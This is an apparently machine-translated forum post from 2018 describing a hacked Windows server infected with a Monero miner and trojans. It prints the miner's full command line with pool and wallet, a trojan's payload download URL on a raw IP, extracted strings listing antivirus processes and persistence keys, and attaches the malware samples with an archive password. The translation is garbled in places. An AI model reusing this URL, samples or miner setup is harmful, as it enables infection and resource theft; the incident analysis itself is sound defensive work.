Eile pärastlõunal avastasin järsku, et veebisaiti ei saa avada, kontrollisin põhjust ja avastasin, et kaugandmebaasi porti ei saa avada, nii et logisin sisse kaugandmebaasi serverisse.
Leidsin, et MySQL teenus on peatunud ja avastasin, et protsessor hõivab 100%, nagu näitab järgmine joonis:
Protsessori hõivatuse sorteerimisel leiti, et "win1ogins.exe" tarbib kõige rohkem ressursse, hõivates 73% protsessorist, isikliku kogemuse järgi peaks see olema kaevandamistarkvara, mis on XMR Monero kaevandamine!
Avastasin ka Yiyu "MyBu.exe" protsessi ja mõtlesin, millal server laadis üles Yiyu-s kirjutatud programmi? Nagu allpool näidatud:
Paremklõpsa "MyBu.exe", et avada faili asukoht, kausta asukoht: C:\Windows, seejärel sorteerida aja järgi ja leida 3 uut faili, nagu allpool näidatud:
1ndy.exe, MyBu.exe, Mzol.exe dokumendid
Neid kummalisi faile nähes tundsin, et server oleks pidanud olema häkitud, vaatasin Windowsi logisid ja leidsin, et logilogid olid kustutatud ning server oli tõesti häkitud!
Proovisime protsessil paremklõpsuga "win1ogins.exe" ja faili asukohta avada, kuid leidsime, et seda ei saanud avada!! Ei mingit reaktsiooni! Hästi! Tööriistad!!
Tööriist, mida kasutan, on "PCHunter64.exe", lihtsalt otsi ja laadi ise alla
Kaust, kus "win1ogins.exe" asub, on: C:\Windows\Fonts\system(x64)\, nagu alloleval joonisel näidatud:
Me ei leia seda kausta Explorerist, nagu allpool näidatud:
Järgmisel operatsioonil kopeerin 3 viiruse Trooja faili oma äsja ostetud serverisse opereerimiseks!!
Kopeerisin viirusefaili oma äsja ostetud serverisse ja proovisin MyBu.exe faili avada ning avastasin, et MyBu.exe oli ise kustutatud! Ja kaevandamistarkvara on välja lastud, me teame, et uurija ei saa failiteed avada,
Proovisime kasutada Windowsi uue versiooniga kaasas olevat powershelli tööriista ja leidsime, et kaevandamistarkvara on olemas ning seal on 3 kausta
(Pane tähele, et tavapärastes tingimustes: C:\Windows\Fonts ei sisalda ühtegi kausta!!)
Paigaldasin oma serverisse FD pakettide salvestamise tööriista, proovisime avada "1ndy.exe" tarkvara, leidsime selle ja proovisime ligi pääseda: http://221.229.204.124:9622/9622.exe peaks alla laadima uusima viiruse trooja
Nüüd on veebileht kättesaamatu.
Proovisime avada "Mzol.exe" tarkvara ja avastasime, et programm ei teadnud, mida ta teha tahab. Avame programmi Notepadiga, nagu allpool näidatud:
LogonServer.exe Mäng – male ja kaardid, GameServer.exe Baidu tappis pehmeid BaiduSdSvc.exe leidsid S-U ServUDaemon.exe lõhkumises DUB.exe skaneerimises 1433 1433.exe kanapüüdmises S.exe Microsoft Antivirus mssecess.exe QUICK HEAL QUHLPSVC.EXE Dr. An V3 V3Svc.exe Dr. Ahn patray.exe Korea kapsel AYAgent.aye Liiklus Ore Miner.exe trend TMBMSRV.exe Ke Niu knsdtray.exe QQ QQ.exe K7 viirusetõrje K7TSecurity.exe QQ Computer Butler QQPCRTP.exe Kingsoft Guardian ksafe.exe Norton Antivirus rtvscan.exe Avast Network Security ashDisp.exe Avira avcenter.exe Kingsoft kxetray.exe NOD32 egui.exe McCafe Mcshield.exe Rising Antivirus RavMonD.exe Jiangmin Antivirus KvMonXP.exe Kaspersky avp.exe 360 Antivirus 360sd.exe 360 Security Guard 360tray.exe : %s:%d:%s F r i e n d l y N a m e SysFreeString Oleaut32.dll CoCreateInstance CoUninitialize CoInitialize Ole32.dll %d*%sMHz HARDWARE\DEscrip{filtering}tION\System\CentralProcessor\0 ~MHz c:\%s kernel32.dll IsWow64Process No info Alustasin sisselogimist SOFTWARE\Microsoft\Windows\CurrentVersion\Run C:\Windows\1ndy.exe descrip{filter}tion SYSTEM\CurrentControlSet\Services\%s RtlGetNtVersionNumbrid ntdll.dll MUUD ühendused HÕIVATUD ÜHENDUSED PROXY ühendused LAN-ühendused MODEM-ühendused NULL CTXOPConntion_Class 3389 PortNumber SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s Ei avastatud Vaikimisi RDP-TCP Autor: Shi Yonggang, email:pizzq@sina.com
Isiklikult arvan, et "Mzol.exe" ja "1ndy.exe" on tegelikult sama asi, lihtsalt erinevus uue ja vana versiooni vahel!
Vaatame win1ogins.exe tarkvara käivitusparameetreid, nagu allpool näidatud:
C:\Windows\Fonts\system(x64)\win1ogins.exe -a cryptonight -o stratum+tcp://pool.supportxmr.com:5555 -u 49YwvcQRrVvYXR2H9Ww5u1FaB3AhGVCuo8iWnc99BVPv5Su2epJ3mYfN3voS6h3Kurd8V5rGPSooyd7LdWYLXXwjSjdZb9y -p MyBlue -o stratum+tcp://pool.minexmr.com:443 -u 49YwvcQRrVvYXR2H9Ww5u1FaB3AhGVCuo8iWnc99BVPv5Su2epJ3mYfN3voS6h3Kurd8V5rGPSooyd7LdWYLXXwjSjdZb9y -p x -k --donate-level=1
Kui me tõesti kaevandame XMR Monero't, avame kaevandamisbasseini aadressi: https://supportxmr.com/ Küsime rahakoti aadressi, nagu alloleval joonisel näidatud:
Arvutame tulu arvutusvõimsuse järgi, kaevame 0,42 münti päevas ja arvutame üle 1000 vastavalt praegusele turule, päevane tulu on tõenäoliselt üle 500 jüaani!
Muidugi on Monero tõusnud ka üle 2000 jüaani!
Mis puudutab "win1ogins.exe" kaevandamisviiruse eemaldamist, siis PCHunter64 programm suudab kaevandamisviiruse käsitsi eemaldada! Lihtsalt protsessi lõpetamine ei aita, olen viiruse serveris käsitsi puhastanud.
Muidugi on parem jätta viiruse eemaldamine teistele, sest ma ei ole selles professionaal!
Lõpuks lisa 3 viirusefaili ja paki parool A123456
1ndy.zip
(1.29 MB, Allalaadimiste arv: 12, 售价: 1 粒MB)
(Lõpp)
|
Postitatud 04.04.2018 12:37:15
|
|
|
|
